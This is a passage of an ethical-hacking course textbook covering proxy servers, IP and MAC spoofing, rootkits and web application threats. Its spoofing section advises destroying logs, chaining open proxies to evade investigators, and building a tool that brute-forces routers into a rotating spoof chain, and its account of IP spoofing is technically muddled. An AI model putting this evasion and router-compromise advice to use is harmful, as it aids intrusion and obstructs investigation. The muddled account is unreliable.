3. Some proxy servers must work with special proxy clients. A more
popular approach is to use off-the-shelf clients such as Netscape with
proxy servers. When such an off-the-shelf package is used, it must be
specially configured to work with proxy servers from a configuration
menu. Then the intranet employee uses the client software as usual.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 261

 Ethical Hacking Part I

The client software knows to go out to a proxy server to get the data,
instead of to the Internet.
4. Proxy servers can do more than relay requests back and forth between
an intranet and the Internet. They can also implement security
schemes. For example, an FTP proxy server could be set up to allow
files to be sent from the Internet to a computer on the intranet,but to
block files from being sent from the corporate network out to the
Internet-or vice versa. In this way, intranet administrators can block
anyone outside the corporation from downloading vital corporate
data. Or they can stop intranet users from downloading files which
may contain viruses.

5. Proxy servers can also be used to speed up the performance of some

Internet services by caching data-keeping copies of the requested
data. For example, a Web proxy server could cache many Web pages,
so that whenever someone from the intranet wanted to get one of
those Web pages, they could get it directly from the proxy server
across high-speed intranet lines, instead of having to go out across
the Internet and get the page at a lower speed from Internet lines.127

18.3 Types of Proxy Server

Normal (Regular/Caching) Proxy:

A regular caching proxy server is a server which listens on a separate

port and the clients (browsers) are configured to send requests for
connectivity to that port. So the proxy server receives the request, fetches
the content and stores a copy for future use. So next time when another
client requests for the same webpage the proxy server just replies to the
request with the content in its cache thus improving the overall request-
reply speed.

Transparent Proxy:

A transparent proxy server is also a caching server but the server is

configured in such a way that it eliminates the client side (browser side)
configuration. Typically the proxy server resides on the gateway and
intercepts the WWW requests (port 80, 443 etc.) from the clients and
fetches the content for the first time and subsequently replies from its
local cache. The name Transparent is due to the fact that the client

127
http://blog.eukhost.com/webhosting/proxy-server-2/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 262
 Ethical Hacking Part I

doesn't know that there is a proxy server which mediates their requests.
Transparent proxy servers are mostly used in big corporate organizations
where the client side configuration is not easy (due to the number of
clients). This type of server is also used in ISP's to reduce the load on the
bandwidth usage.128

Reverse Proxy:

A reverse proxy is totally different in its usage because it is used for the
benefit of the web server rather than its clients. Basically a reverse proxy
is on the web server end which will cache all the static answers from the
web server and reply to the clients from its cache to reduce the load on
the web server. This type of setup is also known as Web Server
Acceleration.

There are many different types of Proxy Servers out there.

Depending on the purpose you can get Proxy Servers to route any of
these common protocols, and many more;

1) FTP Proxy Server:

FTP clients can connect to FTP servers directly and can transmit
and receive files or data directly through direct sockets
connections, but in some cases security to FTP clients is needed.

128
http://www.webupd8.org
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 263
 Ethical Hacking Part I

FTP servers is listening for clients requests on port 21, so any

client wants to deal with any server will just connect to the server
and send it identification data to authenticate itself then ask for its
request, all that in a TCP connection as in figure 1.

2) HTTP Proxy Server:

HTTP proxy servers have several anonymity levels. It depends on

purposes, which a proxy is used for, so an anonymity requirement
is not always an essential one.
Conditionally HTTP proxy servers by their anonymity degree could
be divided onto:129

 Transparent - these proxies are not anonymous. They, first, let

a web server know that there is used a proxy server and,
secondly, "give away" an IP-address of a client. The task of
such proxies, as a rule, is information caching and/or support
of Internet access for several computers via single connection.

 Anonymous - these proxy servers let a remote computer (web-

server) know, that there is used a proxy, however, they do not
pass an IP-address of a client.

 Distorting - unlike the previous type, they transfer an IP-

address to a remote web-server, however, this address is a
phantom: randomly generated by a proxy server or any fixed
(not your) IP. So, these proxies distort your IP address from the
point of view of a web-server.

129
http://www.freeproxy.ru/en/free_proxy/faq/what_is_http_proxy.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 264
 Ethical Hacking Part I

 High anonymous (elite) – they do not send your IP-address to

a remote computer. Also, they do not inform that there is used
any proxy server! So, a web-server "thinks” that it works
directly with a client.

3) Socks Proxy Server:

A SOCKS server is a general purpose proxy server that

establishes a TCP connection to another server on behalf of a
client, then routes all the traffic back and forth between the client
and the server. It works for any kind of network protocol on any
port. SOCKS Version 5 adds additional support for security and
UDP. The SOCKS server does not interpret the network traffic
between client and server in any way, and is often used because
clients are behind a firewall and are not permitted to establish TCP
connections to servers outside the firewall unless they do it
through the SOCKS server. Most web browsers for example can be
configured to talk to a web server via a SOCKS server. Because the
client must first make a connection to the SOCKS server and tell it
the host it wants to connect to, the client must be "SOCKS
enabled." 130

What your browser transmits to a webserver:

 name and a version of an operating system

 name and a version of a browser
 configuration of a browser (display resolution, color depth, java /
JavaScript support, …)
 IP-address of a client
 Other information

The most important part of such information - is information about IP-

address. Using your IP it is possible to know about you the following:

 country where you are from

 city
 your provider’s name and e-mail
 your physical address

130
http://www.jguru.com/faq/view
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 265
 Ethical Hacking Part I

18.4 Use of Proxy Server for attack

Preparing proxy servers is the last step in the CEH scanning

methodology. A proxy server is a computer that acts as an intermediary
between the hacker and the target computer. Using a proxy server can
allow a hacker to become anonymous on the network. The hacker first
makes a connection to the proxy server and then requests a connection
to the target computer via the existing connection to the proxy.
Essentially, the proxy requests access to the target computer, not the
hacker’s computer. This lets a hacker surf the Web anonymously or
otherwise hide their attack.

Socks-Chain is a tool that gives a hacker the ability to attack through a

chain of proxy servers. The main purpose of doing this is to hide the
hacker’s real IP address and therefore minimize the chance of detection.
When a hacker works through several proxy servers in series, it’s much
harder to locate the hacker. Tracking the attacker’s IP address through
the logs of several proxy servers is complex and tedious work. If one of
the proxy servers’ log files is lost or incomplete, the chain is broken, and
the hacker’s IP address remains anonymous.131

If proxy server is open

This discusses the abuse of mis-configured HTTP proxy servers, taking a

detailed look at the types of traffic that flow through this underground
network. Also discussed is the use of a "honeyproxy", a server designed
to look like a mis-configured HTTP proxy. Using such a tool we can spy
on the Internet underground without the need for a full-blown honeypot.

The widespread abuse of proxies started years ago with a program called
Wingate. Before Windows had Internet connection sharing built in,
people with a home network needed a way to route all their machines'
Internet traffic through a single dialup. Wingate served this purpose, but
unfortunately it shipped with an insecure default configuration. Basically
anyone could connect to your Wingate server and telnet back out to
another machine on another port. The company that wrote the software
eventually closed the hole, but the original versions were widely deployed
and infrequently upgraded.

131
http://luizfirmino.blogspot.in/2011/07/understand-how-proxy-servers-are-used.html

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 266

 Ethical Hacking Part I

Users of Internet Relay Chat (IRC) were particularly interested in these

Wingate proxy servers, since attacks such as Winnuke and ping flooding
were becoming popular at the same time. If you could disguise your IP
address when connecting to an IRC server, you could let someone else
take the beating when you were under attack from another IRC user. Of
course, knowledge of how to use proxies gave an advantage to the
attacker as well, as they could also hide the origin of the attack. IRC and
proxy abuse became forever intertwined. Many modern IRC servers won't
even let you connect without probing several ports on your IP address in
an attempt to ensure you are not connecting through a proxy.
Turning to the modern day, we see a second trend in proxy use. Web
traffic has grown at a phenomenal rate over the past 7 years. Companies
and ISPs often turn to caching proxy servers to reduce the tremendous
load on their networks. In order to satisfy the demands of their content-
hungry users, these proxy servers are often configured to proxy any port,
with little regard to security. If there are no access controls blocking
connections from outside the network, it makes it possible to
anonymously port scan the entire TCP port range of other outside
systems. Even worse, some proxies will allow you to connect in reverse;
to machines on a company's internal network.

How to Find Open Proxies

There's no need to port scan huge blocks of IP addresses looking for open
proxy servers. Lists of open proxy servers can be found in seconds with a
simple Google search. These lists are frequently updated, and some even
include bandwidth statistics about each server. However, it should be
noted that most of these proxy servers are not supposed to be public. It
is very common to for a novice administrator to set up a proxy or HTTP
cache with access rights from anywhere. There are programs available on
the Internet to automatically redirect your traffic through different
proxies. Some of these programs even chain proxies together for
additional protection.

a. Method

For the standard HTTP request, it is as easy as telnetting to the proxy on

the designated port and entering a request like "GET
http://www.yahoo.com/ HTTP/1.0" and hitting enter twice. If the proxy
is mis-configured, it will return the page from Yahoo. This means the
proxy is ripe for abuse. When a proxy abuser finds a fresh proxy to use,
the first step is to test the proxy for its anonymity value. Some proxies

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 267

 Ethical Hacking Part I

pass the IP address of the requesting host in the HTTP headers,

something that would be detrimental to illegitimate activities. For a
computer criminal, the ideal proxy will pass zero information about the
real host, and will effectively make it look as though the proxy is the true
attack source. Testing this is easy; there are several sites that will show
you the complete headers of your HTTP request. Some even score the
anonymity of the proxy for you.

b. Setup

To learn more about what kinds of activities are happening on the vast
network of open proxy servers, we set up our own "faux" proxy server.
Basically, we took Randall Schwartz's Anonymous Proxy Server and
modified it for our purposes, using regular expressions and the logic
below:

1. Log all request URLs and complete headers.

2. If a request is bound for a URL that looks like a proxy test, let it
pass.
3. If a request includes HTTP authentication headers, return a "404
denied".
4. If a request is of method type "HEAD", return a "200 Ok" message
5. If a request is of method type "CONNECT", return a "404 Denied"
message
6. If a request looks like an image, return a 1x1 transparent gif
7. All other requests return a blank HTML page.

This should be sufficient to allow us to spy on the malicious activity

passing through our "honeyproxy", while not actually allowing attacks
through to their destinations. Of course, there are ways to fool the
regular expression code, so it is not recommended to leave something
like this in place long enough to give an attacker time to figure out how
to bypass the restrictions unless you are willing to put some extra time
into securing the script.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 268

 Ethical Hacking Part I

18.5 IP address Spoofing

IP address spoofing or IP spoofing refers to the creation of
Internet Protocol (IP) packets with a forged source IP address,
called spoofing, with the purpose of concealing the identity of the
sender or impersonating another computing system.

IP Spoofing

Disguising your IP address with proxies is an easy way to achieve relative

anonymity on the Internet. By relative anonymity I mean that
investigation cell might still find you, but it would take them a little extra
time. It works well as a preliminary line of defense for light corporate
work and personal grudges.

Disguising your IP address with proxies is similar to IP spoofing. But IP

spoofing is a little more difficult and much more difficult to track. IP
spoofing involves changing outbound packets to make them look like
they are coming from an IP other than your own.

IP spoofing works by rerouting IPs through a series of routers so that

your requests to a server look like they are coming from an IP other than
your own. The IP that the responses are actually going to gets rerouted

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 269

 Ethical Hacking Part I

through a number of routers. Each router addresses the packet with a

new IP until the last router in the chain addresses it with your real IP
address.

If any link in that chain is discovered, the typical admin’s response is to

immediately disable it. At that point you will stop receiving response
traffic and will know that a link in the chain has been compromised. You
then know that it is time to start removing the reroutes from the other
routers in your chain and destroying log files. Hopefully, before a second
link can be discovered, you will have had time to remove the entire chain
of router links.

If the admin's want to catch you and aren't too dumb, they won’t disable
the reroute. Instead they will track you traffic until they reach your real
IP by contacting other adman’s and instructing them to track your
reroutes. The best way to avoid this is to periodically rotate your reroute
path.

Proxies spoofing work similarly, except that both your send and response
traffic go through the same server. Once you attach to a proxy server all
network traffic that you generate goes through the proxy server and the
proxy server forwards your requests to their appropriate location. If you
are requesting a website, for instance, the web server believes that the
request is coming from the proxy machine. It never sees who originally
made the request. Thus only way that the website request can be traced
back to your IP address is by getting access to the Proxy server logs and
comparing them to the Web server logs. Not impossible, but time
consuming.

The great thing about proxy spoofing is that many proxy servers are open
and free to use. Generally speaking, the proxy server of any given
organization will be called proxy.organization_name.org. First try to ping
that name to see if the machine exists. ISP’s are the biggest proprietors of
proxy machines.

Once you’ve found five or so proxies you can enter their information into
your web browser to verify that they are open. In Netscape, click on
Options | Network Preferences, then click on the 'Proxies' tab, and check
the radio button 'Manual Proxy config'. I would set it up for HTTP
protocols only at first. Once you have verified that the proxy is open, and
then you can start trying the other protocols. Most proxy machines run
on port 8080, but not always. In Internet Explorer, click View | Options,

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 270

 Ethical Hacking Part I

and click on the 'Connection' tab. From there the set up is the same as
on Netscape.

Once you have found an open proxy, you real IP address won't show up
on Guestbook’s, counter logs, WWW Boards, or Java/html chat rooms.
Browser-based FTP becomes truly anonymous. You may also be granted
access to 'customer only' FTP servers owned by the same people that are
using that proxy server. Also, web applications like Hotmail, etc. will
report the IP of the proxy instead of your own.

Write autil that keeps a record of a chain of compromised routers. It then

uses IP spoofing to scan for and identify new routers, perform a brief
brute force attack (many router adman’s use less than four character
passwords), and replaces the oldest router in the spoof path with the
newly compromised router, thus creating a constantly altering IP spoof
path.

18.6 MAC address spoofing

When you hack something or someone on the Internet, you won’t want
your IP address to spill out. That’s because your ISP could easy trace you
by two simple information which is the Time and IP Address. So you’ll
use proxy or even chains of proxies to avoid being directly traced by the
victim’s firewall. What if the administrator of the proxy server has logs
and your IP is being logged in there? It’s possible that the proxy
administrator passes your information to your ISP and you’ll still get
caught at the end of the day. Don’t forget, there is lots of information to
obtain from an IP Address if a person knows what tools to use. One of it
is your MAC Address.

A MAC address, short for Media Access Control address, is a unique code
assigned to most forms of networking hardware. The address is
PERMANENTLY assigned to the hardware, so limiting a wireless network’s
access to hardware — such as wireless cards — is a security feature
employed by closed wireless networks.

In short, every network card (NIC) has a unique address. On Windows,

you can run the command “ipconfig /all” to reveal your MAC Address.
Take note that it’s called Physical Address when you run the ipconfig
command on DOS.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 271

 Ethical Hacking Part I

Think about this, if your IP Address combined with your MAC Address,
there’s no running away when you’re caught. But if you spoof/change
your MAC Address, they might not have a concrete proof to nail you
down.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 272

 Ethical Hacking Part I

CHAPTER 19
ROOTKIT
Objective

19.1 Introduction
19.2 Definition of Rootkit
19.3 Function of Rootkit
19.4 Types of Rootkit
19.5 Computer Infection
19.6 Symptoms of Rootkit
19.7 Removal of Rootkit
19.8 Protection

19.1 Introduction
It’s not a virus: not Intended to modify files or to causes any damage,

It’s not a Worm: It Does not occupy memory,

It’s not has spyware, aim it can spy its victim,

It Has RAT, Trojan and backdoor features, purpose it’s much more:

It is a Rootkit132

133

132
http://kareldjag.over-blog.com/article-895476.html
133
http://briteccomputers.co.uk/wp-content/uploads/2012/10/qrazy84.jpg
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 273
 Ethical Hacking Part I

Everyone knows about computer viruses and people are rightly fearful of
them. Many have also heard about (computer) worms, which are nasty
programs designed to spread as much as they can to infect computers.

A Rootkit, on the other hand, is devious in a different way. This

unwanted code on your desktop is used to gain control over your desktop
by hiding deep inside your system. Unlike most viruses, it is not directly
destructive and unlike worms, its objective is not to spread infection as
wide as possible.134

At the core of the term "Rootkit" are two words i.e. "root" and "kit". Root
refers to the all-powerful, "Administrator" account on UNIX and Linux
systems, and kit refers to a set of programs or utilities that allow
someone to maintain root-level access to a computer. However, one other
aspect of a rootkit, beyond maintaining root-level access, is that the
presence of the rootkit should be undetectable.135

19.2 Rootkit

A rootkit is a set of software applications intended to conceal running

processes, files or system data from the operating system. In recent
years, rootkits have been used increasingly by malware to help intruders
maintain access to systems while avoiding detection. Rootkit often modify
parts of the operating system or install themselves as drivers or kernel
modules.

The term rootkit is also used to describe the mechanisms and techniques
whereby malware, including viruses, spyware, and Trojans, attempt to
hide their presence from spyware blockers, antivirus, and system
management utilities. There are several rootkit classifications depending

134
http://www.guidingtech.com/4467/what-is-a-rootkit/
135
http://netsecurity.about.com/od/frequentlyaskedquestions/f/faq_rootkit.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 274
 Ethical Hacking Part I

on whether the malware survives reboot and whether it executes in user

mode or kernel mode.136

A rootkit is a stealthy type of software, often malicious, designed to hide

the existence of certain processes or programs from normal methods of
detection and enable continued privileged access to a computer.[1]
Rootkit installation can be automated, or an attacker can install it once
they've obtained root or Administrator access. Obtaining this access is a
result of direct attack on a system (i.e. exploiting a known vulnerability,
password (either by cracking, privilege escalation, or social engineering)).
Once installed it becomes possible to hide the intrusion as well as to
maintain privileged access. The key is the root/Administrator access.
Full control over a system means that existing software can be modified,
including software that might otherwise be used to detect or circumvent
it.
Rootkit is an application (or set of applications), that hides its presence
or presence of another application (virus, spyware, etc.) on the computer,
using some of the lower layers of the operating system (API function
redirection, using of undocumented OS functions, etc.), which makes
them Almost undetectable by common anti-malware software.137

19.3 So what does a Rootkit do?

Root kit is designed to provide access

to all your folders, both private data
and system files to a remote user
who, through administrative powers,
can do whatever he wants with your
computer. Needless to say, every user
should be aware of the threat they
pose.

136
http://www.rootkitfinder.com/rootkit.htm
137
http://www.avg.com/ww-en/faq.num-2353
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 275
 Ethical Hacking Part I

Rootkits generally go much deeper than the average virus. They may
even infect your BIOS!138 They are often considered as Trojan horses and
indeed may even contain Trojans and backdoors as part of the rootkit.

A rootkit is designed for following:

 To hide logins
 To hide processes
 To files and logs
 To intercept data from terminals, network connections, and the
keyboard.
 To provide access of file and folder in short all the data.
 To provide administrative access.139

19.4 Types of Rootkit:

There are basic types of root kit. We’ll discuss in detailed as follows.

 Persistent Rootkit:
A persistent rootkit activates each time the system boots. Normally
these types of Rootkit are stored in the system registry.

 Memory-Based or non-Persistent Rootkit:

Memory-based rootkits will not automatically run after a reboot; they
are stored in memory and lost when the computer reboots.

 User-mode Rootkit:
User-mode rootkits operate at the application layer and filter calls
going from the system API (Application programming interface) to the
kernel. These rootkits normally change the system binary files to
malicious code that redirects control of the computer to the creator of
the rootkit.

138
http://www.guidingtech.com/4467/what-is-a-rootkit/
139
http://www.5starsupport.com/tutorial/rootkits.htm
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 276
 Ethical Hacking Part I

 Kernel-mode Rootkit:
Kernel-mode rootkits hook to the system’s kernel API’s and modify
data structure within the kernel itself. These are the most effective
and dangerous types of rootkits. Kernel-mode rootkits are very
difficult to detect and can hide on a system without any indication of
being active.

 Bootkit:
Bootkits are variations of kernel-mode rootkits that infect the Master
Boot Record (MBR). The malicious code can be executed before the
computer actually boots.

 Firmware:
A firmware rootkit infects a device or piece of hardware where code
resides, such as a network card or the system BIOS.

 Hypervisor
These are newer types of rootkits that are infecting the hypervisor
layer of a virtual machine setup. The hypervisor is basically the layer
between physical hardware (host systems) and the virtual system
(guest), although a type II hypervisor can be installed on top of an OS
in order to present a virtual layer to the virtual system. These rootkits
can intercept hardware “calls” going to the original operating
systems.140

Categories:

There are two basic categories that modern rootkits in the wild can be
divided into: those that are designed to hook, and those that are
designed to use DKOM. These will be explained below. Hacker defender is
one of the more popular rootkits that works by hooking. It hides
processes, services, files, directory keys and ports. FU is a popular
rootkit that is designed to use DKOM. Fu can hide processes and device
drivers and elevate privileges and groups of any Windows process.

140
http://www.technibble.com/how-to-remove-a-rootkit-from-a-windows-system/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 277
 Ethical Hacking Part I

 Hooks:

In the above section, we mentioned a hook. A hook, or hooking, is a

method used by a rootkit to alter the normal execution path of the
operating system. Modern operating systems are designed to be
flexible, extendable and backward compatible. If they weren’t, you
would have to replace all your applications software with newer
versions every time you got a newer computer or newer operating
system. This is why if you upgraded to, let’s say, Windows XP, your
other software still runs with Windows XP as it did with your older
operating system.

By using a hook, a rootkit can alter the information that the original
operating system function would have returned, using it for the
rootkits’ own designs as programmed by the attacker.

Some of the more common areas a rootkit will hook are: execution
paths, import address tables, system service descriptor tables, and
layered filter drivers.

 DKOM:

DKOM stands for Direct Kernel Object Manipulation. Rootkits

designed to use DKOM rely on creation of kernel objects by the
operating system, which are normally used by the system for
auditing normal operation. By modifying these objects sufficiently,
the rootkit can trick the operating system into thinking a particular
operation or process was performed by a normal function of the
program. This will prevent the system from logging an incorrect
operation, and a system alert, thus allowing the rootkit to remain
hidden from normal detection means. Since all kernel process
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 278
 Ethical Hacking Part I

objects are linked, the rootkit unlinks the process it performed

from itself, and links it to a normal process function of the
operating system. The system is tricked, and thinks the operation
was performed as a legitimate function of the program.141

19.5 So how computer get infected with a rootkit?

As mentioned above, a rootkit may piggyback along with software

that you thought you trusted. When you give this software
permission to install on your computer, it also inserts a process
that waits silently in the background for a command. And, since
to give permission you need administrative access, this means
that your rootkit is already in a sensitive location on the
computer.

Another way to get infected is by standard viral infection

techniques either through shared disks and drives with infected
web content. This infection may not easily get spotted because of
the silent nature of rootkits.

There have also been cases where rootkits came pre-installed on

purchased computers. The intentions behind such software may
be good. For example, anti-theft identification or remote
diagnosis – but it has been shown that the mere presence of such
a path to the system itself is vulnerability.142

141
http://www.5starsupport.com/tutorial/rootkits.htm
142
http://www.guidingtech.com/4467/what-is-a-rootkit/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 279
 Ethical Hacking Part I

19.6 Generic symptoms of rootkit infestation

Rootkits are frustrating. By design, it’s difficult to know if they are
installed on a computer. Even experts have a hard time but hint
that installed rootkits should get the same consideration as other
possible reasons for any decrease in operating efficiency. Sorry for
being vague, but that’s the nature of the beast. Here’s a list of
noteworthy symptoms:

 If the computer locks up or fails to respond to any kind of input

from the mouse or keyboard, it could be due to an installed
kernel-mode rootkit.
 Settings in Windows change without permission. Examples of
this could be the screensaver changing or the taskbar hiding
itself.
 Web pages or network activities appear to be intermittent or
function improperly due to excessive network traffic.
If the rootkit is working correctly, most of these symptoms aren’t
going to be noticeable. By definition, good rootkits are stealthy.
The last symptom (network slowdown) should be the one that
raises a flag. Rootkits can’t hide traffic increases, especially if the
computer is acting as a spam relay or participating in a DDoS
attack.143

19.7 How to remove the Rootkit?

There are different approaches and really no single full-proof

method, neither is it guaranteed that the rootkit will be fully
removed. As a matter of fact, there are some computer security
experts who simply recommend formatting the drive and
completely re-installing the operating system.

The Manual Method

This may or may not be more time consuming than trying to

search using an automatic tool. If you are familiar with legitimate
Windows services and programs and can pick out suspicious files,

143
http://www.techrepublic.com/blog/10things/10-things-you-should-know-about-rootkits/416
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 280
 Ethical Hacking Part I

then this could be the way to go. Many times, rootkit scanners
will not detect rootkit infections, especially if they are new, so this
may be the way to go if you don’t want to go straight to the nuke-
and-pave solution.

Rootkit detection is difficult because a rootkit may be able to

subvert the software that is intended to find it. Detection methods
include using an alternative and trusted operating system,
behavioural-based methods, signature scanning, difference
scanning, and memory dump analysis. Removal can be
complicated or practically impossible, especially in cases where
the rootkit resides in the kernel; reinstallation of the operating
system may be the only available solution to the problem. When
dealing with firmware rootkits, removal may require hardware
replacement, or specialized equipment.144

The reliable ways of manually detecting rootkits

I. Defeat A Rootkit Using A System Copy

If an uninfected copy of the test system is available as a reference,

rootkits can be detected by doing a file-by-file comparison between
the current system and the uninfected copy.

Here the infected system is treated just as data, so the cloaking

effect of the rootkit is not in play. In this situation, the rootkit and
its payload can be easily discovered.

However, this is a situation that would be rarely encountered in

practice, as almost no one has a reference copy of their system.
Systems are not static anyway... legitimate changes are constantly
taking place within a system and such changes make simple file
comparisons difficult.

II. Defeat A Rootkit Using An Alternative Boot Device

The best rootkits detection method requires you to shut down the
system and check its storage by choosing an alternative boot

144
http://en.wikipedia.org/wiki/Rootkit
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 281
 Ethical Hacking Part I

device, such as a CD Rom or a USB drive. Because the system

boots from an alternative media source, you will be able to bypass
the rootkit. So, now you know how to prevent the rootkit from
becoming active, but not how to detect and remove it.

A recommended way for detection of the presence of a rootkit is to

boot from an alternative media, which is known to be clean (i.e. a
backup, or rescue CD-ROM) and check the suspicious system. The
advantage of this method is that the rootkit will not be running
(therefore it will not be able to hide itself) and the system files will
not be actively tampered.

III. By Cleaning MD5 fingerprints

One way is to have clean MD5 fingerprints of the original system

files to compare the current system files fingerprints. This method
is not very reliable, but is better than nothing. Using a kernel
debugger is more reliable, but it requires in-depth knowledge of the
operating system.

IV. Defeat A Rootkit With Data Wiping

Once rootkits are detected, you should do a data wipe instead of a

delete or format. Data wiping is a more secure way of eliminating
the rootkit problem to guard privacy and security at a higher level -
- formatting alone may not remove the rootkit.

After a fresh installation of the operating system you should

monitor the files and save the logs. Also, do this after installing
other software titles and compare the reports. Now you'll be able to
compare these logs with your current live system to determine
whether there has been a further rootkit infection.

Although this system is a bit complicated and not advisable for the
majority of home users, it is also the most effective rootkit
prevention technique. Specialists refer to this as "fingerprinting" --
during the process a hash function is used to track down changes
in the data. Compression of the hash files will reveal changes that
were not made intentionally by the system administrator, thus
revealing any hidden rootkits.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 282

 Ethical Hacking Part I

V. By signature or heuristics-based antivirus programs

Rootkit binaries can often be detected by signature or heuristics-

based antivirus programs, at least until they're run by a user and
are able to attempt to conceal themselves. There are inherent
limitations for any program that attempts to detect rootkits while
the program is running under the suspect system. Rootkits are
suites of programs that modify many of the core system tools and
libraries upon which all programs on the system depend. Some
rootkits attempt to modify the running operating system via
loadable modules on Linux (and some other UNIX varieties), and
through VxDs, virtual external device drivers on MS Windows
platforms. The fundamental problem with rootkit detection is that
if the operating system currently running has been subverted, it
cannot be trusted, including to find unauthorized modifications to
itself or its components. In other words, actions such as requesting
a list of all running processes, or a list of all files in a directory,
cannot be trusted to behave as intended by the original designers.

Tools:

AutoRuns, Process Explorer, msconfig, AVG’s Rootkit Scanner

Those tools can be used to find suspicious processes and files

and, each have a unique form of analysis.

If these rootkit scanners are not finding anything, or they do find

something but can’t delete it, then you may have to move to the
manual method. You can also keep trying other tools but there
does come a point when you have to evaluate if the time and effort
is worth it or you should either try a manual method, or perform
a full re-installation of the operating system.145

145
http://www.technibble.com/how-to-remove-a-rootkit-from-a-windows-system/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 283
 Ethical Hacking Part I

19.8 How to protect computers against Rootkit?

Each of these techniques has its limitations, and for this reason it
is highly recommended to integrate various different technologies.
It must also be taken into account that some of these rootkits are
expressly designed to avoid detection by those antivirus companies
that lead the market.

The first line of defence against rootkits consists in preventing

them from entering your computer. To do this, please bear in mind
the following basic advice on protection against malware:

 Install a good antimalware solution on your computer, and

always keep it activated and updated.
 Install a firewall that will protect against unauthorized access
to your computer.
 Always ensure that the applications installed on your computer
are kept up-to-date, and make sure to install any security
patches supplied by manufacturers.
 However, the task of protecting yourself against rootkits is not
to be taken lightly, and cannot be limited to a series of generic
protection measures.

In order to help users to detect the existence of rootkits in their

computers and delete them with absolute precision, Panda
Security makes available the tool Panda Anti-Rootkit . Use this free
utility to detect and delete any possible rootkits in your
computer.146

146
http://www.pandasecurity.com/homeusers/security-info/types-malware/rootkit/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 284
 Ethical Hacking Part I

CHAPTER 20
Web Application Security
Objective
20.1 Introduction
20.2 Risk Associated With Web Application
20.3 Anatomy of Web Attack
20.4 Web Application Threats
20.5 Hacking Tools
20.6 Countermeasures
20.7 Hacking of Web Server
20.8 Hardening of Web Server

20.1 Introduction
As most businesses rely on web sites to deliver content to their
customers, interact with customers, and sell products certain
technologies are often deployed to handle the different tasks of a web
site. A content management system like Joomla or Drupal may be the
solution used to build a robust web site filled with product, or service,
related content. Businesses often turn to blogs using applications like
Word Press or forums running on phpBB that rely on user generated
content from the community to give customers a voice through
comments and discussions. ZenCart and Magento are often the solutions
to the e-commerce needs of both small and large businesses who sell
directly on the web. Add in the thousands of proprietary applications
that web sites rely and the reason securing web applications should be a
top priority for any web site owner, no matter how big or small.147

147
http://www.applicure.com/solutions/web-application-security
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 285
 Ethical Hacking Part I

148

Web Application Hacking

Various high-profile hacking attacks have proven that web

security remains the most critical issue to any business that conducts its
operations online. Web servers are one of the most targeted public faces
of an organization, because of the sensitive data they usually host.
Securing a web server is as important as securing the website or web
application itself and the network around it. If you have a secure web
application and an insecure web server, or vice versa, it still puts your
business at a huge risk. Your company’s security is as strong as its
weakest point.

Although securing a web server can be a daunting operation and requires

specialist expertise, it is not an impossible task. Long hours of research
and an overdose of coffee and take away food, can save you from long
nights at the office, headaches and data breaches in the future.
Irrelevant of what web server software and operating system you are
running, an out of the box configuration is usually insecure. Therefore
one must take some necessary steps in order to increase web server
security.149

20.2 Risks Associated with Web Applications

Web applications allow visitors access to the most critical resources of a

web site, the web server and the database server. Like any software,
developers of web applications spend a great deal of time on features and
functionality and dedicate very little time to security. It’s not that
developers don’t care about security; nothing could be further from the

148
http://www.appneta.com/uploadimages/Web-Applications.jpg
149
http://www.acunetix.com/websitesecurity/webserver-security/
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 286
 Ethical Hacking Part I

truth. The reason so little time is spent on security is often due to a lack
of understanding of security on the part of the developer or a lack of time
dedicated to security.
For whatever reason, applications are often riddled with vulnerabilities
that are used by attackers to gain access to either the web server or the
database server. From there any number of things can happen. They
can:
 Deface a web site
 Insert spam links directing visitors to another site
 Insert malicious code that installs itself onto a visitor’s computer
 Insert malicious code that steals session IDs (cookies)
 Steal account information (Credit Card)
 Steal information stored in the database
 Access restricted content
 Domain Naming System Attack
 Denial Of Service
 Exploiting Buffer Overflow
 Exploiting Server Side Scripting150

20.3 Anatomy of Web Application Attack:

Hackers always find new ways to compromise your web application's

security but there are patterns they follow in every attempt of an
attack. Knowing these patterns is essential for closing security gaps
and preventing your system from being hacked.151

150
http://www.applicure.com/solutions/web-application-security
151
http://www.securitybay.co.uk/articles/anatomy-of-a-web-application-attack
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 287
 Ethical Hacking Part I

20.4 Web Application Threats:

Malicious users will examine a website and its infrastructure to

understand its design and identify any potential weakness that can be
exploited. Web application vulnerabilities provide the potential for an
unauthorized user to gain access to critical information, use resources
inappropriately, or interrupt legitimate campus business. How the
exploitation is carried out varies depending upon the weakness found
and the goal of the exploiter.152 Many web application threats exist on a
web server. The following are the most common threats:

 Cross-site scripting

Cross site scripting (also known as XSS) occurs when a web

application gathers malicious data from a user. The data is usually

152
http://inews.berkeley.edu/articles/Aug-Sep2010/web-app-vulnerabilities
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 288
 Ethical Hacking Part I

gathered in the form of a hyperlink which contains malicious

content within it. The user will most likely click on this link from
another website, instant message, or simply just reading a web
board or email message. Usually the attacker will encode the
malicious portion of the link to the site in HEX (or other encoding
methods) so the request is less suspicious looking to the user when
clicked on. After the data is collected by the web application, it
creates an output page for the user containing the malicious data
that was originally sent to it, but in a manner to make it appear as
valid content from the website. Many popular guestbook and forum
